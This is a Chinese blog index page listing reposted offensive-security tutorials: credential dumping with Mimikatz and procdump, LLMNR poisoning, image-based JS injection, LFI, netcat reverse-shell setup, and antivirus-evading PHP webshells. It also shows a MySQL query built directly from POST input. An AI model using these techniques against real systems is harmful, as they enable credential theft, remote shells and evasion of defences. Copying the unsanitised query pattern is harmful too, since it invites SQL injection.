• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
DemonSpider‘s BLOG
愿我的的剑芒<-|->永远闪耀!
博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 订阅 | 管理
上一页 1 2 3 4 5 6 ··· 11 下一页

2013年11月16日

得到内网域管理员的5种常见方法<转>
摘要: 1.Netbios and LLMNR Name Poisoning这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(http://www.packetstan.com/2011/03/nbns-spoofing-on- 阅读全文
posted @ 2013-11-16 18:41 DemonSpider 阅读(2635) 评论(0) 推荐(0)
 
 

2013年11月6日

利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)
摘要: Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对于NT6可以使用windows自带的功能进行dump:任务管理器—进程—显示所有用户进程—找到lsass—右键“创建转储文件”2.对于NT5可以使用微软的Procdump工具(这当然不会引起杀软报毒)Proc 阅读全文
posted @ 2013-11-06 15:52 DemonSpider 阅读(1616) 评论(0) 推荐(0)
 
 

2013年10月29日

图片攻击-BMP图片中注入恶意JS代码 <转载>
摘要: 昨天看到一篇文章《hacking throung images》,里面介绍了如何在BMP格式的图片里注入JS代码,使得BMP图片既可以正常显示, 也可以运行其中的JS代码,觉得相当有趣。 执行JS注入的脚本 关键:构造符合正常BMP格式的图片 步骤 1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/* BMP文件的第三、四、五、六字节表示BMP文件的大小 2. 在BMP文件末尾添加 (1)\xFF (2)\x2A\x2F,对应的js中的注释符号*/ (3)\x3D\x31\x3B,对应的=1; 是为了伪造成BMP格式 (4)定制的JS代码 BMPinject. 阅读全文
posted @ 2013-10-29 14:24 DemonSpider 阅读(2005) 评论(0) 推荐(0)
 
 

2013年10月25日

LFI漏洞利用总结(转载)
摘要: 主要涉及到的函数include(),require()、include_once(),require_once()magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、post_max_size()、and max_input_time()等 典型漏洞代码: 黑盒判断方法:单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、en. 阅读全文
posted @ 2013-10-25 20:15 DemonSpider 阅读(925) 评论(0) 推荐(0)
 
教你看懂邮件头信息<转载>
摘要: MIME对于邮件系统的扩展是巨大的,因为在MIME出现以前,信件内容如果要包括声音和动画,就必须把它变为ASCII码或把二进制的信息变成可以传送的编码标准,而接收方必须经过解码才可以获得声音和图画信息。MIME提供了一种可以在邮件中附加多种不同编码文件的方法。一封邮件主要由邮件头和邮件体组成.邮件头包含了发件人、收件人、主题、时间、MIME版本、邮件内容的类型等重要信息。每条信息称为一个域,由域名后加“: ”和信息内容构成,可以是一行,较长的也可以占用多行。域的首行必须“顶头”写,即左边不能有空白字符(空格和制表符);续行则必须以空白字符打头,且第一个空白字符不是信息本身固有的。邮件体包含邮件 阅读全文
posted @ 2013-10-25 00:49 DemonSpider 阅读(1995) 评论(0) 推荐(0)
 
 

2013年9月26日

史上最全!信息安全入门指南<转>
摘要: 以下所列出的链接均为在线文档,有志于信息安全的爱好者可由此作为入门指南。背景知识常规知识Sun认证-Solaris 9&10安全管理员学习指南PicoCTF资料应用软件安全OWASP安全编码规范漏洞挖掘Windows ISV软件安全防御移动安全OWASP十大移动手机安全风险网络安全常规网络攻击类型逆向工程华盛顿大学:硬件/软件接口伦敦大学:恶意软件和地下产业——一个巴掌拍不响Web安全OWASP十大Web应用安全风险在线课程多学科课程ISIS实验室黑客之夜涉及源码审计、Web安全、逆向工程、漏洞挖掘、Post-Exploitation、应用软件安全开放式安全训练涉及逆向工程、漏洞挖掘、 阅读全文
posted @ 2013-09-26 21:53 DemonSpider 阅读(1167) 评论(0) 推荐(1)
 
 

2013年9月24日

MySQL常用查询语句集合《转》
摘要: 一查询数值型数据: SELECT * FROM tb_name WHERE sum > 100; 查询谓词:>,=,,!=,!>,!,='' order by addtime desc 注:相当于PHP中的!= 六利用变量查询数值型数据 SELECT * FROM tb_name WHERE id = '$_POST[text]' 注:利用变量查询数据时,传入SQL的变量不必用引号括起来,因为PHP中的字符串与数值型数据进行连接时,程序会自动将数值型数据转变成字符串,然后与要连接的字符串进行连接 七利用变量查询字符串数据 SELECT * FR 阅读全文
posted @ 2013-09-24 00:04 DemonSpider 阅读(358) 评论(0) 推荐(0)
 
 

2013年9月20日

PHP+MySQL多语句执行<转自wooyun>
摘要: 发起这个帖子,估计就很多人看到题目就表示不屑了。一直以来PHP+MySQL环境下,无论是写程序或者是注入攻击,是无法多语句执行的,这么广为人知的常识,没理由会有人不知道。可权威就是用来被挑战的,常识也就是为了被打破的。如果没有一点创新性,追根到底的求知欲,一直在条条框框里挣扎,那还有什么争取自由、解析世界的Hacker,Geek精神?最近在wooyun上看到一个很简单的sql注入案例,虽然漏洞很简单,但是其中蕴含的内容可大大不同。亮点在于:作者居然在注射利用过程中使用了mysql的多语句执行。感谢作者@紫梦芊 ,让我们一直以来奉为金科玉律的信条被彻底颠覆。本着Know it then hack 阅读全文
posted @ 2013-09-20 00:12 DemonSpider 阅读(501) 评论(0) 推荐(0)
 
 

2013年9月19日

在linux下编译netcat并且反弹cmdshell(转载)
摘要: 本地Windows监听nc -vv -l -p 1234首先从sf上get一个tar的压缩包wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz然后当然是解压了tar zxvf netcat-0.7.1.tar.gz解压完毕之后会生成目录,要cd进去cd netcat-0.7.1然后进行编译前的配置。./configure配置完了之后就可以make编译了。 www.2cto.com编译成功就生成了netcat可执行的文件 阅读全文
posted @ 2013-09-19 23:47 DemonSpider 阅读(466) 评论(0) 推荐(0)
 
关于php一句话免杀的分析<转载>
摘要: 一开始想这样: 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost附加数据. 这中间考虑了这些: 猛然发现assert这个关键词又出现了。。 既然字符串可以直接这样用,那还可以这样: 或者用 $a = str_replace(x,"",axsxxsxexrxxt) 以上说来,感觉 算是最难查到的一种了。 ========================== ywisax 在论坛上又发了这个: 不... 阅读全文
posted @ 2013-09-19 19:03 DemonSpider 阅读(641) 评论(0) 推荐(0)
 
 
上一页 1 2 3 4 5 6 ··· 11 下一页

公告


博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3